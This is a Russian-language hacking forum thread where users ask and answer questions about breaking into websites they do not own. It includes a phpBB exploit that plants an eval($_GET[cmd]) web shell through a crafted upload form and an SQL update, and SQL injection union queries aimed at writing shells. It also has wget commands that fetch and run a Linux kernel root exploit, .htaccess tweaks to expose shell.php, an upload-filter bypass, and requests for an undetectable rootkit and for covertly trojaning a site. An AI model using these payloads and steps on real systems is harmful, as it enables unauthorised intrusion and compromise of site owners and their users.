Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. .:[melkiy]:.

    .:[melkiy]:. Elder - Старейшина

    Joined:
    25 Jan 2009
    Messages:
    476
    Likes Received:
    313
    Reputations:
    163

    1. создаёшь у себя на компе 1.html
    2. засовываешь туда
    HTML:
          <form action="http://your_site.ru/forum/profile.php?mode=editprofile&cmd=copy($_FILES[file][tmp_name], $_GET[bob]);&bob=/home/z/u/zucchini/public_html/forum/images/avatars/htaccess.php
    " method="post" enctype="multipart/form-data">
    <input type="file" name="file">
    <input type="submit" value="upload">
    </form>
         
    3. создаёшь 1.sql
    4. суёшь туда
    PHP:
          UPDATE phpbb_users SET user_sig_bbcode_uid='(.+)/e\0'user_sig='phpbb:eval($_GET[cmd])' WHERE username='USERNAME';
        
    5. открываешь через браузер 1.html
    6. выбираешь шелл
    7. жмёшь upload
    8. проверяешь, http://your_site.ru/forum/images/avatars/htaccess.php

    так ясно? %)
     
    3 people like this.
  2. GOGA075

    GOGA075 Elder - Старейшина

    Joined:
    30 Mar 2008
    Messages:
    210
    Likes Received:
    10
    Reputations:
    11
    А может кто подскажет как через phpmyadmin сделать админом любого юзера форума phpbb3!
     
  3. apolon47

    apolon47 Banned

    Joined:
    13 Apr 2009
    Messages:
    181
    Likes Received:
    15
    Reputations:
    4
    Ребят, помогите залить шелл через двойной запрос.
    Не могу залить т.к magic_quotes = on

    ?uid=-93+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14+from+mysql.user--

    выводится 2 и 8. file_priv = Y

    Почитал https://forum.antichat.ru/showpost.php?p=663815&postcount=39... не получается
     
  4. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,711
    Likes Received:
    405
    Reputations:
    196

    load_file() скрипта, прочитай его, глянь как запрос составляется, исходя из этих данных залей шелл через "двойной запрос"(если возможность есть такая), в противном случае, читай файлы и доставай инфу, которая поможет залить шелл(пасс от мускула и тд)




    посмотри таблицу с юзерами, глянь админа, и по аналогии сделай так же.
     
    3 people like this.
  5. karencho777

    karencho777 New Member

    Joined:
    20 Jan 2010
    Messages:
    8
    Likes Received:
    0
    Reputations:
    0
    нашел уязвимость "вставление пхп кода":pHP не ограничивает набор символов в идентификаторе сессии (PHPSESSID) в обработчиках сессии, разработанных сторонними производителями, что может облегчить злоумышленникам, действующим удаленно, эксплуатацию других уязвимостей, если они внедрят PHP-код в PHPSESSID, который хранится в файле сессии. Замечание: существует мнение, что данная проблема не является уязвимостью в самом PHP, а является скорее конструктивным ограничением, которое позволяет проводить определенные атаки против обработчиков сессии, которые не учитывают данное ограничение .
    как можно етим воспользоватса?
    еше насканил "пеереполнение буфера":Переполнение буфера в функции snmpget в расширении snmp в PHP позволяет злоумышленникам выполнить произвольный код, используя длинное значение в третьем аргументе (object id). так же уязвимость форматной строки и повышение привилегий все ето на 80 порту сайта помогите пожалуйсто наитй експлойт или что то т.п спасибо
     
  6. daniel_1024

    daniel_1024 Elder - Старейшина

    Joined:
    15 Jul 2009
    Messages:
    265
    Likes Received:
    227
    Reputations:
    386
    скажите что можно сделать ,если на сервере не включено gcc (нельзя сплойты компилировать). можно их уже в скомпилированном виде загружать?
     
  7. apolon47

    apolon47 Banned

    Joined:
    13 Apr 2009
    Messages:
    181
    Likes Received:
    15
    Reputations:
    4
    у меня легко читаются папки. но не могу прочесть .php файлы. не знаю что за бред.

    p.s и дальше /usr/local/www/apache22/data/http даже папки не могу смотреть. юзаю hex
     
    #12787 apolon47, 8 May 2010
    Last edited: 8 May 2010
  8. .:[melkiy]:.

    .:[melkiy]:. Elder - Старейшина

    Joined:
    25 Jan 2009
    Messages:
    476
    Likes Received:
    313
    Reputations:
    163
    http://milw0rm.com/sploits/2009-linux-sendpage3.tar.gz
    http://milw0rm.com/sploits/2009-linux-sendpage2.tar.gz

    wget http://milw0rm.com/sploits/2009-linux-sendpage3.tar.gz
    tar xvfz 2009-linux-sendpage3.tar.gz
    chmod 777 linux-sendpage3 -R
    cd linux-sendpage3
    ./run
     
    1 person likes this.
  9. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,711
    Likes Received:
    405
    Reputations:
    196

    прав нет значит на файлы. Если текст запроса в случае ошибки не выводится, то проэксплуатировать "двойной запрос" будет сложно - если только подбирать варианты, и это в случае если действительно есть два и\или более запроса
     
  10. GOGA075

    GOGA075 Elder - Старейшина

    Joined:
    30 Mar 2008
    Messages:
    210
    Likes Received:
    10
    Reputations:
    11
    подниму вопрос свой

     
  11. Rew

    Rew New Member

    Joined:
    12 Mar 2010
    Messages:
    14
    Likes Received:
    0
    Reputations:
    0
    Как можно незаметно затроянить сайт есть доступ к БД что можно там написать что бы сайт попал под потанцеально опасные для пользователя сайты в выдачи поискавика.
     
  12. Rew

    Rew New Member

    Joined:
    12 Mar 2010
    Messages:
    14
    Likes Received:
    0
    Reputations:
    0
    А не легче ли поправить хешь админа потом зайти под его правами и дать себе полномочия.
     
  13. GOGA075

    GOGA075 Elder - Старейшина

    Joined:
    30 Mar 2008
    Messages:
    210
    Likes Received:
    10
    Reputations:
    11
    Есть файл .htaccess
    в нем

    <Files *>
    Order Allow,Deny
    Alow from All
    </Files>

    из-за него выдает ошибку 500 какуюто.

    Нужно шоб файлл shell.php читался свободно!
     
  14. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,711
    Likes Received:
    405
    Reputations:
    196

    <Files *.php>
    Order Allow,Deny
    Alow from All
    </Files>
     
  15. GOGA075

    GOGA075 Elder - Старейшина

    Joined:
    30 Mar 2008
    Messages:
    210
    Likes Received:
    10
    Reputations:
    11
    попугай
    да там все файлы .php
     
  16. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,711
    Likes Received:
    405
    Reputations:
    196
    <Files shell.php>
    Order Allow,Deny
    Alow from All
    </Files>
     
  17. daniel_1024

    daniel_1024 Elder - Старейшина

    Joined:
    15 Jul 2009
    Messages:
    265
    Likes Received:
    227
    Reputations:
    386
    какой руткит под линукс посоветуете? какой лучше и не палится?
     
  18. GOGA075

    GOGA075 Elder - Старейшина

    Joined:
    30 Mar 2008
    Messages:
    210
    Likes Received:
    10
    Reputations:
    11
    попугай а так пишет что пра не хватает!
     
  19. FlaktW

    FlaktW Member

    Joined:
    19 Aug 2009
    Messages:
    483
    Likes Received:
    33
    Reputations:
    12
    На сайте есть загрузка pdf,doc,jpg файлов.

    Заливаю шелл: shell.php
    Выводит такую ошибку: shell.php already exists

    Пробую так: shell.php.pdf
    Выводит: shell.php.pdf already exists

    Как здесь обойти фильтрацию?
     
  20. Ctacok

    Ctacok Banned

    Joined:
    19 Dec 2008
    Messages:
    754
    Likes Received:
    649
    Reputations:
    251
    asdklhasdjasdjkasdhjkasdhdkhhasdas.php уплоадь.
     
Loading...
Thread Status:
Not open for further replies.